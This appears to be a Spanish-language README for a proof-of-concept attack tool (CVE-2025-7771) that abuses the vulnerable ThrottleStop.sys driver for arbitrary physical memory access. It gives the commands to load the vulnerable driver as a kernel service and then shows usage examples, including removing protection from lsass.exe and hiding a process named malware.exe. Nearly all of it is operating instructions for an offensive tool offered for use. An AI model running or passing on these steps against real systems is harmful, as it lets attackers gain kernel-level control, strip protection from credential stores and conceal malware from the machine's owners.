
Una PoC simple que demuestra la vulnerabilidad en el controlador ThrottleStop.sys, mostrando capacidades arbitrarias de lectura y escritura de memoria física, así como la traducción de direcciones virtuales a físicas mediante Superfetch.
Un PoC simple que demuestra la vulnerabilidad en el controlador ThrottleStop.sys, mostrando capacidades arbitrarias de lectura y escritura de memoria física, así como la traducción de direcciones virtuales a físicas mediante Superfetch.
Ejecute cmd.exe con privilegios de administrador y registre un servicio de controlador de kernel con el tipo "kernel" y binPath apuntando a la ubicación del controlador vulnerable.
> sc create ThrottleStop binPath= <path> type= kernel`
> sc start ThrottleStop
Comandos:
--protect : Protect a process.
--unprotect : Unprotect a potected process.
--hide : Hide a process.
--unhide : Unhide a process.
--help : Print help
Ejemplos:
CVE-2025-7771.exe --protect notepad.exe o CVE-2025-7771exe --protect 12345
CVE-2025-7771.exe --unprotect lsass.exe o CVE-2025-7771.exe --unprotect 12345
CVE-2025-7771.exe --hide malware.exe o CVE-2025-7771.exe --hide 12345
Para mostrar un proceso oculto, puede usar el comando --unhide especificando la dirección eprocess del proceso oculto con '--eprocess':
CVE-2025-7771.exe --unhide --eprocess 0xffffc207da1d9240
Usted es responsable de asegurarse de tener la autorización adecuada antes de utilizar esta herramienta. El autor no asume ninguna responsabilidad por el mal uso.
Este es un proyecto en curso, ¡las contribuciones y sugerencias son bienvenidas! Si tienes ideas, mejoras o deseas colaborar, no dudes en contactar a: [email protected]